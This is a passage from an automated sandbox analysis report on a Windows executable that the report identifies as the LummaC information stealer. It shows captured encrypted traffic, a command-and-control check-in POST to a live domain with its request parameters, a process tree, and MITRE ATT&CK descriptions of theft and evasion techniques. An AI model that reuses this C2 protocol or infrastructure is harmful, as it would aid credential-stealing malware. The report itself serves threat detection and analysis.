2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: fe c1 87 d8 a7 7f d4 c5 10 c3 d8 f8 5d 1a af a5 c8 0d 96 99 aa 76 81 5f 1b 1a ae ef 42 8c 9a 8e d1 9e bd a1 07 23 8e a2 e0 ed c6 2d 3e e2 e0 cd 5d c7 98 ec 72 71 24 ff ac 5a 0b b4 94 ac 36 9b 3b 7c a4 62 7f 37 61 6e 4d a2 05 b3 1d fb 74 d4 7f a6 a5 df 7e 8e 8c 4e 70 c1 00 5b 15 45 86 ff 80 e0 60 02 ec b2 df 56 b1 db 51 eb 68 2b cf c9 2b 99 d8 de 14 2d 3a f5 6e 22 6e 11 11 72 82 58 e8 f2 38 68 f5 92 6e b1 63 b6 9c d4 15 12 57 22 90 f9 62 5a 28 56 38 10 90 59 3d 59 41 58 a9 6a 63 0b 11 85 ac 09 06 5f 7c 67 2f 11 15 16 2c 22 33 f5 e2 4b 8a 94 90 38 d6 f9 d6 e7 54 73 82 cf e5 3c b8 b5 8d fb 63 5b 00 1c bf f7 83 02 e3 70 7f b4 dc d4 24 97 84 8e 71 6b 8c 08 40 dc 51 97 49 9e 60 09 ab d7 38 e6 1c b3 46 cb 7f 83 88 ac ce 99 5c 35 a6 1c b8 92 72 98 64 8a 9d d4 90 Data Ascii: ]v_B#->]rq$Z6;\|b7anMt~Np[E`VQh++-:n"nrX8hncW"bZ(V8Y=YAXjc_\|g/,"3K8Ts<c[p$qk@QI`8F\5rd
2024-12-26 11:41:37 UTC	15331	OUT	Data Raw: bd 2d 71 ac db 08 84 de 85 04 d8 95 c6 6e 9e cb 66 57 37 f0 c2 c6 9b 07 1c 42 c3 1b 78 7e e3 5b 07 cf fa 47 34 b8 f3 d3 52 6a 3c eb 96 e7 01 82 3a ac 4e cc 80 49 6b b7 30 83 38 01 57 8d 5d 2b 10 a8 ce 55 34 eb 05 ce 8d 09 be 54 85 a8 21 7e ad 9c c0 21 2d c0 fb c5 59 35 91 ba c6 38 da 00 6f 7c ee 5a 85 67 44 4a 04 ef 57 68 04 76 55 2f 54 30 88 69 73 01 95 17 7f 6a b1 5f 62 60 57 2d c6 90 a8 80 e5 22 3a c7 9b e4 46 0c 7e 4a b3 18 8e 9e af 19 47 fe 16 77 2e ba 4b e5 87 f5 8c 56 65 b6 53 73 be f3 14 20 86 c9 b8 c4 ff 0c 78 34 4b 02 38 c0 68 3d b1 15 ee 29 3a 77 cd 35 20 ea ac 53 99 9c fe a6 77 51 f7 e1 a5 53 62 df f5 41 06 f7 68 ea dc 2e 27 40 b9 74 e4 be c7 c5 23 dd 8b 88 08 c7 4b f5 f6 9b 7f 42 e8 e3 08 ac 13 ec c0 76 3a 60 f5 11 ab 60 a1 28 71 56 23 5d b9 Data Ascii: -qnfW7Bx~[G4Rj<:NIk08W]+U4T!~!-Y58o\|ZgDJWhvU/T0isj_b`W-":F~JGw.KVeSs x4K8h=):w5 SwQSbAh.'@t#KBv:``(qV#]
2024-12-26 11:41:41 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4vv1chdkacail6k15qtb5e78q3; expires=Mon, 21 Apr 2025 05:28:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h89IlskqKGNNCWjx3zoj1m8MESPPRbC3xzPZQZy2XDqtYYIYEotk%2BfeJD1O3cWFEei4CWYW0rNd0TExBnD6qiDzRip7CmlfVgCzlTvXHtpEfoq8ik8q4RSnApS7C88LrWek%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd881c325e7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1738&rtt_var=664&sent=350&recv=575&lost=0&retrans=0&sent_bytes=2838&recv_bytes=554120&delivery_rate=1633109&cwnd=224&unsent_bytes=0&cid=2aac9dce1f34fd11&ts=3759&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49762	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:42 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: mindhandru.buzz
2024-12-26 11:41:42 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 31 31 33 33 39 34 31 44 36 44 42 39 32 37 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=1133941D6DB92719BEBA0C6A975F1733
2024-12-26 11:41:43 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nvm5ta072815mtbr8cpl8ilktp; expires=Mon, 21 Apr 2025 05:28:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bMLQxxdyoXmYXd5tQWEpesoNvixlyAWzfVCUgOTB%2BK7%2F%2B3qRPcDvyom%2F1BE%2B%2BGey7bDX%2Fxa5dtoovXGMKev6aIgqIeecYS%2BEOAa04LZh2f9rgt7nPCsGlZv%2FBweVHsin7wU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cda86ab14310-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1603&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1783750&cwnd=242&unsent_bytes=0&cid=b15c13058b6f6bd8&ts=800&x=0"
2024-12-26 11:41:43 UTC	210	IN	Data Raw: 63 63 0d 0a 78 4e 72 47 39 37 2b 31 77 67 71 71 6e 6e 58 73 31 47 58 42 56 76 6f 77 75 64 69 4b 5a 78 55 74 32 43 79 7a 51 55 66 61 38 6c 65 66 6f 65 53 43 6e 59 2f 67 59 74 37 71 42 64 61 49 53 70 31 35 79 77 69 4d 39 72 68 57 49 41 50 70 48 59 42 76 64 75 79 75 65 4b 75 38 6f 4b 75 51 30 61 64 73 68 50 73 4e 69 66 5a 4a 34 7a 43 4f 45 6f 50 6f 70 6b 56 77 44 2b 49 64 7a 6d 30 38 2b 49 64 31 2f 76 69 75 67 38 76 46 2b 46 61 46 77 6c 72 64 37 46 44 76 5a 4d 73 46 6c 2b 6d 37 56 44 73 63 37 6e 43 63 4c 69 47 38 72 6e 69 67 76 36 44 5a 32 73 32 6e 4b 49 61 38 45 35 6a 32 58 2f 46 36 32 46 57 62 34 72 6f 61 53 41 3d 3d 0d 0a Data Ascii: ccxNrG97+1wgqqnnXs1GXBVvowudiKZxUt2CyzQUfa8lefoeSCnY/gYt7qBdaISp15ywiM9rhWIAPpHYBvduyueKu8oKuQ0adshPsNifZJ4zCOEoPopkVwD+Idzm08+Id1/viug8vF+FaFwlrd7FDvZMsFl+m7VDsc7nCcLiG8rnigv6DZ2s2nKIa8E5j2X/F62FWb4roaSA==
2024-12-26 11:41:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:41:17
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\rwFNJ4pHWG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rwFNJ4pHWG.exe"
Imagebase:	0x190000
File size:	2'955'776 bytes
MD5 hash:	87E3D63F63A76CF5D2567F56880A719B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:41:54
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:41:55
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1892,i,7369555305632958663,5508331813539714622,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:41:57
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:41:57
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1900,i,6860416848940867115,5479095251510896605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rwFNJ4pHWG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Windows Analysis Report
rwFNJ4pHWG.exe